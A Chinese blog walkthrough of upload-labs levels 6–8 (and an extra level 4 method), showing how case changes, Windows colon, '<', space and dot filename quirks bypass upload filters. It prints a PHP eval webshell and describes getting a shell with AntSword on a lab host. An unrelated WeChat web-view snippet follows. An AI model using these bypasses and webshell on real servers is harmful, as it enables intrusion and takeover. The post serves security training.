渗透测试-文件上传之大小写和window特性绕过(三)

文件上传之大小写和window特性绕过

文件上传upload-labs实验室第6,7,8关

前言

一、什么是window特性

window特性就是window对于文件的后缀名自动的修改,例如空格和点,冒号后面的内容都省略掉,可以利用window特性进行绕过。

二、大小写和window特性绕过

1.大小写绕过

第六关没有限制大小写,可以进行大小写绕过
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
上传文件zhi.PhP
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16上传成功。
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload/202204160654088873.PhP
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

这里补充关卡四,实验还有另一个方法,也可以行的通就是利用window特性冒号进行绕过。
第一步
上传58.jpg文件
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
第二步
用burp抓包,修改后缀名,修改为58.php:.jpg重发
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
修改成功,成功上传58.php文件,将58.php:.jpg解析成.php文件,冒号后面的内容都会省略掉,会生成.php文件
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_14,color_FFFFFF,t_70,g_se,x_16
在burp上再修改为58.<进行重发
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
再查看文件大小,原来上传的时候是0kb,再上传是大小增加了
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_17,color_FFFFFF,t_70,g_se,x_16
打开文件查看,里面存在一句话木马

<?php @eval($_POST['chopper']); ?>

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
复制网址上传到蚁剑进行连接
http://192.168.222.4/upload/upload/58.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

关卡四的实验原理很简单,利用window和php环境的叠加特性,以下符号在正则匹配时的相等性:
双引号’’ = 点号.
大于符号> = 问号?
小于符号< = 星号*

上面则是用了<号,再次上传58.<,重写58.php内容,webshell代码就会写入原来的空文件中。

2.利用空格和点绕过

接下来进行第七关
看一下源代码,发现没有限制空格
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
利用空格进行绕过,在window中,空格会自动省略
上传zhi.PhP文件,进行抓包修改文件后缀名
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
在zhi.PhP后面加上空格和点
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
找到路径
…/upload/202204160636393878.php
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload//202204160748393371.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

第八关
查看源码可知没有限制点,利用点进行绕过
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
上传58.jpg文件,进行抓包修改为58.php.
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
复制网址到蚁剑连接
http://192.168.222.4/upload/upload/58.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center
连接成功,成功拿到shell。

总结

本次实验是对文件上传漏洞进一步提升练习,学会了window特性方法的绕过,介绍了几种常用的绕过方法。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
在微信小程序中,可以通过 `web-view` 标签加载一个 web 页面,并且可以在该页面中调用一些函数。同时,也可以在小程序中通过 `wx` 对象调用一些 `web-view` 实例上的函数。 以下是一些示例代码: 1. 在 `web-view` 页面中调用 `window` 上的函数 在 web 页面中,可以使用 `window` 对象定义一个自定义函数,例如: ```js function customFunc() { console.log('custom function called'); } ``` 然后在页面中的某个事件或函数中调用该函数,例如: ```js document.getElementById('btn').addEventListener('click', function() { window.customFunc(); }); ``` 在小程序中,则可以通过 `wx.createWebViewContext` 方法获取 `web-view` 实例的上下文对象,然后使用 `postMessage` 方法向页面发送消息,从而调用该函数,例如: ```js const webViewContext = wx.createWebViewContext('web-view'); webViewContext.postMessage({type: 'callCustomFunc'}); ``` 在 web 页面中,则需要监听 `message` 事件,当收到消息时调用相应的函数,例如: ```js window.addEventListener('message', function(event) { if (event.data.type === 'callCustomFunc') { customFunc(); } }); ``` 2. 在小程序中调用 `web-view` 实例上的函数 在小程序中,可以通过 `wx.createWebViewContext` 方法获取 `web-view` 实例的上下文对象,然后直接调用该对象上的函数,例如: ```js const webViewContext = wx.createWebViewContext('web-view'); webViewContext.postMessage({type: 'callWebViewFunc'}); ``` 在 web 页面中,则需要监听 `message` 事件,当收到消息时调用相应的函数,例如: ```js window.addEventListener('message', function(event) { if (event.data.type === 'callWebViewFunc') { // 调用 web-view 实例上的函数 console.log('web-view function called'); } }); ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值